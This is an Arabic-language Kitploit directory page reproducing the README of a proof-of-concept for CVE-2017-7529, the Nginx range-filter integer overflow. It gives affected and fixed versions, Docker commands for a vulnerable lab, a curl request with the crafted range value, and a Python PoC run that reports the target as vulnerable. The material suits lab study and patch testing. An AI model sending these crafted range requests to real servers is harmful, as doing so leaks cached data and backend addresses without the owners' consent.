Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-7529 — استغلال لإثبات المفهوم لتجاوز سعة الأعداد الصحيحة في Nginx (CVE-2017-7529) يتيح كشف ترويسات ذاكرة التخزين المؤقت عبر طلبات نطاق مصممة بعناية، مع بيئة مختبر مبنية على Docker ونص برمجي لـ POC بلغة Python. | Kitploit
أدوات/GitHubGitHub/liusec/cve-2017-7529
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubliusec/cve-2017-7529

CVE-2017-7529

استغلال لإثبات المفهوم لتجاوز سعة الأعداد الصحيحة في Nginx (CVE-2017-7529) يتيح كشف ترويسات ذاكرة التخزين المؤقت عبر طلبات نطاق مصممة بعناية، مع بيئة مختبر مبنية على Docker ونص برمجي لـ POC بلغة Python.

عرض المستودع
1682منذ 9 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة تجاوز عدد صحيح في Nginx CVE-2017-7529

معلومات الثغرة

عند استخدام وحدة nginx القياسية، يمكن للمهاجم إرسال طلب header يحتوي على حقل range مُصمَّم بشكل خبيث للحصول على معلومات رأس ملفات ذاكرة التخزين المؤقت في الاستجابة. في بعض التكوينات، قد يحتوي رأس ملف ذاكرة التخزين المؤقت على عنوان IP للخادم الخلفي أو معلومات حساسة أخرى، مما يؤدي إلى تسريب المعلومات.

المرجع: تحليل الثغرة: تجاوز عدد صحيح في فلتر range الخاص بـ Nginx (CVE–2017–7529) تحليل إنذار مبكر

تأثير الثغرة

تؤثر هذه الثغرة على جميع إصدارات Nginx من 0.5.6 إلى 1.13.2 مع الوحدات النمطية ذات التكوين الافتراضي. يكفي تفعيل ذاكرة التخزين المؤقت لكي يتمكن المهاجم من إرسال طلبات خبيثة لشن هجوم عن بُعد يؤدي إلى تسريب المعلومات.

عندما يستخدم خادم Nginx ذاكرة تخزين مؤقت وكيلة (proxy cache)، يمكن للمهاجم استغلال هذه الثغرة للحصول على عنوان IP الحقيقي للخادم الخلفي أو معلومات حساسة أخرى.

وفقًا لتحليلنا، فإن صعوبة استغلال هذه الثغرة منخفضة ويمكن تصنيفها ضمن ثغرات low-hanging-fruit، ولها قيمة استغلال معينة في الهجمات الإلكترونية الحقيقية.

الإصدارات المتأثرة

إصدار Nginx من 0.5.6 إلى 1.13.2

الإصدارات المُصحَّحة

إصدار Nginx 1.13.3 و1.12.1

تجهيز البيئة:

  1. اسحب الصورة إلى جهازك المحلي
root@kitploit:~
$ docker pull medicean/vulapps:n_nginx_1
  1. شغّل البيئة
root@kitploit:~
$ docker run -d -p 8000:80 medicean/vulapps:n_nginx_1

-p 8000:80 الرقم 8000 الموجود قبله يمثل منفذ الجهاز الفعلي، ويمكن تحديده كما تشاء.

الاستخدام والاستغلال

POC

  1. الوصول إلى ملف ذاكرة التخزين المؤقت للحصول على Content-Length، مع أخذ /proxy/demo.png كمثال:
root@kitploit:~
$ curl -I http://127.0.0.1:8000/proxy/demo.png

HTTP/1.1 200 OK
Server: nginx/1.13.1
Date: Wed, 12 Jul 2017 15:57:57 GMT
Content-Type: image/png
Content-Length: 16585
Connection: keep-alive
Last-Modified: Wed, 12 Jul 2017 15:57:57 GMT
ETag: W/"40c9-5543e4fad0d40"
X-Proxy-Cache:: MISS
Accept-Ranges: bytes

لاحظ أن Content-Length: 16585، اختر قيمة أكبر من هذا الرقم، مثل 17208، وقيمة النطاق الثاني (range) هي 0x8000000000000000-17208، أي 9223372036854758600

  1. اضبط قيمة range في الطلب كما يلي:
root@kitploit:~
$ curl -i http://127.0.0.1:8000/proxy/demo.png -r -17208,-9223372036854758600

النتيجة:

سكربت PoC

root@kitploit:~
$ python poc.py http://127.0.0.1:8000/proxy/demo.png

Vulnerable: http://127.0.0.1:8000/proxy/demo.png

الروابط المرجعية

  • تحليل الثغرة: تجاوز عدد صحيح في فلتر range الخاص بـ Nginx (CVE–2017–7529) تحليل إنذار مبكر
  • تحليل ثغرة تجاوز عدد صحيح في Nginx (CVE-2017-7529)
تنزيل الأداة